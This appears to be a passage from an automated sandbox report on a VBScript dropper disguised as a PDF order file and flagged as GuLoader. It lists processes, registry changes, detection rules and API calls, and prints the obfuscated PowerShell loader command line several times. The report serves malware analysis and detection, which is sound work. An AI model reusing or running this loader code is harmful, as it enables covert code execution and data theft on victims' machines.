AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl	Jump to behavior

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: Skakspillene.ShellExecute Squawky, " " & chrw(34) & B6 & chrw(34), "", "", 0

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5068
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5068			Jump to behavior

Source: Ordine n.47201 pdf.vbs, type: SAMPLE	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_5812.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D4C8B70	17_2_1D4C8B70
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D4C87F8	17_2_1D4C87F8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D4CE844	17_2_1D4CE844
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D4C0870	17_2_1D4C0870
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D4C6BE0	17_2_1D4C6BE0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D4C6420	17_2_1D4C6420
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200F9020	17_2_200F9020
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200F7888	17_2_200F7888
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200FC178	17_2_200FC178
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200FDF10	17_2_200FDF10
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200F4B28	17_2_200F4B28
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_200FD231	17_2_200FD231
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_20103418	17_2_20103418
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_20101834	17_2_20101834
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_20102FD8	17_2_20102FD8
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_20100070	17_2_20100070
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_20100015	17_2_20100015

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D2AB206 NtQuerySystemInformation,		17_2_1D2AB206
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D2AB1D5 NtQuerySystemInformation,		17_2_1D2AB1D5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: Ordine n.47201 pdf.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Section loaded: security.dll

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg NoQCouacaPrkPieIdrSt)Te;Is[stDStlSulYmIChmMapAfoUdrPotTa(Bo`"""AmaDodBuvSpaUfpzoiCo3Ba2Bi`"""sh)Va]SapUnuAabGelHaiBecUn ArsSutJuaOktHaiOncPe CoeprxIctsreterTinBi ToiLanNutPo LySDuehytArSSbeCorHivBiiChcPreSaBMaiFjtWesFr(SniSlnSatEr AfGUnaBerRe,NsiPenTytli HuTUdeKonAhogrnDi,MoitanFltTe JoDZoeSesBapKr,maiTrnSutSa GyEEvxUdpKl	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.cmdline	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESEEA4.tmp" "c:\Users\user\AppData\Local\Temp\i3ontxzb\CSC7271579FEF14719AB8809EB2A5F450.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D2AAAB6 AdjustTokenPrivileges,		17_2_1D2AAAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Code function: 17_2_1D2AAA7F AdjustTokenPrivileges,		17_2_1D2AAA7F

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cooiigyo.4mo.ps1

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5860:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Ordine n.47201 pdf.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe

File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

Jump to behavior

Source:

Binary string: l;C:\Users\user\AppData\Local\Temp\i3ontxzb\i3ontxzb.pdb source: powershell.exe, 00000003.00000002.601070377.0000000004CE1000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IHost.CreateObject("WScript.Shell");IWshShell3.Exec("CMD.EXE /c echo %windir%");IWshExec.StdOut();ITextStream.ReadLine();IWshShell3.RegWrite("HKEY_CURRENT_USER\Necrological\Ignoreringers\Skifret", "6wJcQOsCOQG60O6XBOsCm9txAZuB6hLiwCxxAZtxAZuBwj60KijrAptvcQGb6wLsresCgvjr", "REG_SZ");IFileSystem3.FileExists("C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe");IShellDispatch6.ShellExecute("C:\Windows\syswow64\WindowsPowerShell\v", " "$Skoleeksempel = """SmADrdZodSy-CoTbl", "", "", "0")

Yara detected GuLoader

Source: Yara match

File source: 00000011.00000000.507338046.0000000000F20000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Skoleeksempel = """SmADrdZodSy-CoTblySapCeeCh Lo-UnTOryHapUdeFoDMaeSyfCaiMhnNaiPhtPriFoopenpe Uf'teuResBliHenSmgGe TaSSkyOpsQutUeeanmBo;BauDosFriAlnOrgJe KaSFjyMisSptVmeDrmra.CoRBauTunVatwaipamSaeTr.viIManUntGieOmrBaoHuphySGoeImrApvTriOmcCleOvsNa;PopAfuChbKulDuiMocDo DasLetAnaButLyipocJo ArcfelUnaAmsHesNo DiSudtNouSpeInoBurScgRelAseElrOvsAx1Re Ti{Pr[suDWhlFolFeIRimUnpAzoSurPatst(En`"""AswOpimanInsAspCaonooFolSg.RedNgrEkvRe`"""Po)Ho]FrpTruEmbSelZeiChcDj BisKatGlaPrtImiGecHe PaeObxFotReeMirBrnca LiiAcnSutel EnPDerEfiFonBatMaeFirAfMSceCosTesAdaDigHeeMiBPeoApxVa(MeiSunRetBa SkSHytOpaHebRrlSt,asiBunBatSc SydSneAdlDeaUngoptFo,PriBinBitRo SkCunrPuoBl,LaiTunHytLa NoRFriBevReuValUn,RaiRonCatEt EpTMarFroBapKeiEfcBa,SeirunMotLl CoSVakSeiBotFosReecr)Bi;Cy[rtDMulBalAtILimLapFeoRerImtIn(Ra`"""KlAUnDEuVLeAAcPBaIAf3Fr2Pa.CoDAnLHaLLg`"""Tu)Sp]RepGruJubMulStiOscoc masFatReaUntRaiStcKn ReePrxPitdeeBerEnnSi AniGanSgtAa snRIneBrgErQGouBaeOlrfryTrIDenClfChoEnKWieTrySt(MaiStnFltMi NoPSpoDutAdtTeeHynsu,PriPrnsatFr OrTSkeSolUneReoArlDe,AkiInnBetfo CoPRelSauMerUn,LeiUnnLatFl dyFSyuFisEfiImoStnAt,OuiIonCuthe AasBeaIllWa,BaiPonAntRk KoSGiaUnuUn,NyiGinSrtBo StkLoasnlReken,GriArnmetDi HyWtaeTaeAf,OdiEmnFltIr NuGAboHedGikKo,SiiTonBrtIm MeSovyMonHaaBinRo,VeiRenAatCa BrPAgeByaSj,VaiHanPhtgo NiBBriNorGakPl)Sa;Su[anDRelRalMoISemHopYooPerSntVi(Re`"""DikWieVorPrnKoesmlQu3Gl2Os`"""Un)Sl]bopInuGabKalAmiFlcFu RnsFetStaPrtAsiCecOv BreZoxswtSteRerAmnOp StiHanCytPh TeDRauDrpRelSoiHocKnaMutAneMuHIraAmnFodMilLeeSi(RoiSpnBatOp SpHMijGaeun,UniGunQutTr CrMLoeAkeAvtEsiBenFl,ReiMonAmtur HoUGonUnoUnrSj,dyiRanTitFl KaemoxBeaGecPr,DdiPhnEktTu BaOMavPieBrrBi,DiiTinMitRc UdBFaiDyoOumSyepecDi,MiiBunXitOp OnSMiihulPauSk)Pr;Kr[ThDBalAflBaIInmFopDeoRorOptUn(Rh`"""mokFoeSprPrnExeAmlAd3He2Op`"""Ld)Un]FepAbuFebSklDeiIncSn AfsNetKeaEqtSaiSucSt SaeGrxdatAneIrrRenAm NeiPenDitdo FoVfeiWorBltCeuOpaFllAnAInlBilUaoSucEl(MoiSunFatNo PrvDe1Ba,FdiTrnuntFo FivAl2Tr,WeiSpnSttKa CovFo3Fo,OsiGanWitRe SavBe4Ca)Vi;Ou[KaDPalKrlfiIAnmScpVioXyrTitMe(ax`"""MauMesWieTarEk3Di2Kr`"""Fa)Ne]CapLeuWobMalYdiIncAn BosExtGraFrtCiiCocEt OpeVaxEntZueGnrKande AliTinMaton UsGfeeNetVePOvrKloThpAl(CoiFinFatBr UrEdegEnyTo,naiTinBatLs LeSBehNeati)As;Ma[SiDPllNelDuICamvapSgoShrWatTy(Te`"""UnuJosDeeCarCo3Sy2gu`"""Fi)Ur]SkpStuAnbHylHeiLycAg SmsMitSuaTitOdiVacli BoeRwxTrtSkeVerUnnNo hyiMonLitEu blCThrOveBraIntFleTjCTiuOprAtsTroIorPr(FoiDenTitEf glMIseUnlUnlFy,GeitansotMa koREkrHalIm,BuiSknErtAw SuFRilPoyTagSo,StiImnLatKo AcfBeaImsIntSplBe,PiiadnBrtPr CrBReaAgaBenSt1Fo1Pu1Ha,HyiStnTytUn StPHasFoeDauDi,ShiEnnEdtbg 